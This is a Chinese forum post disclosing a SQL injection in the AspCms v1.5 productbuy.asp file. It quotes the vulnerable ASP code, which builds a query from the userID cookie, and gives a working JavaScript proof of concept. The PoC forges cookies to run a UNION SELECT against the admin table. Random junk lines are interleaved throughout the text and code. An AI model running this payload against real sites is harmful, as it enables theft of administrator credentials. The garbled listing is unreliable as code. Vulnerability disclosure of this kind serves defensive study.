AspCms_v1.5_20110517 SQL注射漏洞及修复

admin

好久没上土司了，上来一看发现在删号名单内.....
也没啥好发的，前些天路过某个小站，用的AspCms这个系统，搜索了下，productbuy.asp这个文件存在注射，但是目标已经修补....下载了代码，很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞，但是就在同一个文件下面找到了注射漏洞。。。。。。。
! z0 z0 B! N0 H. F废话不多说，看代码：

<%
. p/ z" S: [5 z. I* P1 A  R
if action = "buy" then

8 F3 q! X* o" h' T; U* D        addOrder()
* h- ]9 K) A  ]( P
& I' K' J" D* [2 belse
0 z$ ?& Y- [# |
' D9 Z9 f: n9 s. \. V2 k  x        echoContent()

end if


7 Q% Q! V+ M" e1 c1 m. E( N
……略过

5 y. I' X1 d  \8 `( m1 i

# H! n% v7 K% x* N, i' {Sub echoContent()
7 _! V* p& U  Z( }0 Q# i
        dim id

8 x% {. ^8 t1 I        id=getForm("id","get")
: D) T/ s! R8 Y
; W- a* R2 r& L" H$ q        

        if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品！","-1"

7 K# W$ p0 A: t  k+ t. I        
  \: c% v5 J, M) \6 l
. |" x) h4 Q+ E+ D. W9 {% T! \        dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")

        dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct

6 i1 Z  ]" I. \" Q4 v! z) F        Dim templatePath,tempStr
0 P" T0 S* l0 L! ~
        templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"

3 t6 m/ D& y4 ^/ }; R: o
+ X5 _3 C( L$ Z% ?: \
        set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")

        selectproduct=rsObj(0)
6 W4 F  E: D7 }8 V! v3 z) F
        
0 v$ z& P: k; L  d' i! f
        Dim linkman,gender,phone,mobile,email,qq,address,postcode

        if isnul(rCookie("loginstatus")) then  wCookie"loginstatus",0

9 z' ~" h, f! ]        if rCookie("loginstatus")=1 then  
: u" @0 f1 t) e
                set rsObj=conn.Exec("select *  from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
7 j- ~/ Q* U  f& l6 [" P
                linkman=rsObj("truename")
- g- Z& _* Y7 f& B& X3 s3 y1 V
                gender=rsObj("gender")
  g- U- d: x9 u0 |  _: I: a
, i' Y, G6 m, M. i$ j+ I                phone=rsObj("phone")
- X$ m$ C! u) a- G6 k% e+ z/ Q
# [& H- ^4 E+ D                mobile=rsObj("mobile")
& V; t+ V1 s! ]5 }
+ W" F7 N) F! |' e) a6 T                email=rsObj("email")
2 b6 a" z1 E5 T" _2 n1 y. ]
2 p" E' K2 @, z3 T6 N1 P                qq=rsObj("qq")
. n+ u7 X7 }' c1 a/ {
; b( O/ L8 B3 ?1 \+ f8 e8 g& |                address=rsObj("address")
1 y; J2 N3 w% W# a
                postcode=rsObj("postcode")
/ f$ O6 m" U% d( G$ S- f% s; b5 \
        else

                gender=1
% N+ g" ~- V2 O8 k2 [+ F3 d2 K
9 D5 ^: b* K: e# `# O$ p6 e* P        end if
+ q) b7 b( m. a
0 ~" E2 T  }( z        rsObj.close()

               

& o' c! |' g  q/ D, C) B        with templateObj
& j% Q# r: l5 j, h* \
4 Y4 v$ Z7 L- L4 B4 h6 w9 V                .content=loadFile(templatePath)        
6 s# H$ i% A+ V
                .parseHtml()
/ Q3 ?; Y. Y: n" s, |, q5 }
                .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)

* W# m8 O1 I* e2 {' J; W% p# O                .content=replaceStr(.content,"[aspcms:linkman]",linkman)               
: }  ?- B! q9 l
6 Y% i3 A3 J6 S2 S8 ]                .content=replaceStr(.content,"[aspcms:gender]",gender)               

                .content=replaceStr(.content,"[aspcms:phone]",phone)               
/ o2 ^: Q: f( M) a, T$ H% |; u
4 I8 J  \# ]( Y                .content=replaceStr(.content,"[aspcms:mobile]",mobile)               
* J0 \2 V  z  R, M& d
                .content=replaceStr(.content,"[aspcms:email]",email)                        
) Q$ [7 C, N" v' P/ `: Q
- K& c+ ?3 i! e8 H                .content=replaceStr(.content,"[aspcms:qq]",qq)                        
1 i/ P: R+ j* @  g# }
                .content=replaceStr(.content,"[aspcms:address]",address)                        
/ N5 g( |5 `- ^
                .content=replaceStr(.content,"[aspcms:postcode]",postcode)        
9 N2 r# G0 q8 f" T. F
- n$ t2 \# _& F" R6 _; M: |6 q                .parseCommon()                 
/ d& ~# W6 k2 b7 i8 Y' [1 F/ d
) t+ b/ ^1 s, I9 F7 G# v, f                echo .content

        end with
! B$ n6 \8 h2 Z$ h0 @4 L, ]8 @
        set templateobj =nothing : terminateAllObjects
- F$ e1 C# G* Y4 `# Y' W
  K2 [5 g- Q, p/ }- PEnd Sub
9 A# G' {8 g; b漏洞很明显，没啥好说的
" P! ^' ?- f4 Ppoc：

) a3 g9 D" G8 o& K- x! ~javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外，脚本板块没权限发帖子​
8 n" S7 K7 U0 C3 ?3 t( q+ z, J